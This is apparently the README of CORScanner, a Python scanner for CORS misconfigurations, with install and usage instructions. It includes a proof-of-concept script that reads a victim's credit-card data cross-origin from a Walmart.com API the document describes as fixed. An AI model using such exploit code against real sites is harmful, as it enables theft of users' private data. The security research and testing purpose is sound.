chenjj / Corscanner

About CORScanner

CORScanner is a python tool designed to discover CORS misconfigurations vulnerabilities of websites. It helps website administrators and penetration testers to check whether the domains/urls they are targeting have insecure CORS policies.

Features

• Fast. It uses gevent instead of Python threads for concurrency, which is much faster for network scanning.
• Comprehensive. It covers all the common types of CORS misconfigurations we know.
• Flexible. It supports various self-define features (e.g. file output), which is helpful for large-scale scanning.
• 🆕 CORScanner supports installation via pip (pip install corscanner or pip install cors)
• 🆕 CORScanner can be used as a library in your project.

Two useful references for understanding CORS systematically:

• USENIX security 18 paper: We Still Don’t Have Secure Cross-Domain Requests: an Empirical Study of CORS
• 中文详解：绕过浏览器SOP，跨站窃取信息：CORS配置安全漏洞报告及最佳部署实践

Screenshots

Installation

• Download this tool

git clone https://github.com/chenjj/CORScanner.git

• Install dependencies

sudo pip install -r requirements.txt

CORScanner depends on the requests, gevent, tldextract, colorama and argparse python modules.

Python Version:

• Both Python 2 (2.7.x) and Python 3 (3.7.x) are supported.

CORScanner as a library

• Install CORScanner via pip

sudo pip install corscanner

or use the short name:

sudo pip install cors

• Example code:

>>> from CORScanner.cors_scan import cors_check
>>> ret = cors_check("https://www.instagram.com", None)
>>> ret
{'url': 'https://www.instagram.com', 'type': 'reflect_origin', 'credentials': 'false', 'origin': 'https://evil.com', 'status_code': 200}

You can also use CORScanner via the corscanner or cors command: corscanner -u https://www.instagram.com -vv

Usage

Examples

• To check CORS misconfigurations of specific domain:

python cors_scan.py -u example.com

• To enable more debug info, use -vvv:

python cors_scan.py -u example.com -vvv

• To check CORS misconfigurations of specific URL:

python cors_scan.py -u http://example.com/restapi

• To check CORS misconfiguration with specific headers:

python cors_scan.py -u example.com -d "Cookie: test"

• To check CORS misconfigurations of multiple domains/URLs:

python cors_scan.py -i top_100_domains.txt -t 100

• To list all the basic options and switches use -h switch:

python cors_scan.py -h

Misconfiguration types

This tool covers the following misconfiguration types:

Welcome to contribute more.

Exploitation examples

Here is an example about how to exploit "Reflect_any_origin" misconfiguration on Walmart.com(fixed). Localhost is the malicious website in the video.

Walmart.com video on Youtube:

Here is the exploitation code:

<script>
    // Send a cross origin request to the walmart.com server, when a victim visits the page.
    var req = new XMLHttpRequest();
    req.open('GET',"https://www.walmart.com/account/electrode/account/api/customer/:CID/credit-card",true);
    req.onload = stealData;
    req.withCredentials = true;
    req.send();

    function stealData(){
        //reading response is allowed because of the CORS misconfiguration.
        var data= JSON.stringify(JSON.parse(this.responseText),null,2);

        //display the data on the page. A real attacker can send the data to his server.
        output(data);
    }

    function output(inp) {
        document.body.appendChild(document.createElement('pre')).innerHTML = inp;
    }
</script>

If you have understood how the demo works, you can read Section 5 and Section 6 of the CORS paper and know how to exploit other misconfigurations.

License

CORScanner is licensed under the MIT license. take a look at the LICENSE for more information.

Credits

This work is inspired by the following excellent researches:

• James Kettle, “Exploiting CORS misconfigurations for Bitcoins and bounties”, AppSecUSA 2016*
• Evan Johnson, “Misconfigured CORS and why web appsec is not getting easier”, AppSecUSA 2016*
• Von Jens Müller, "CORS misconfigurations on a large scale", CORStest*

Version

Current version is 1.0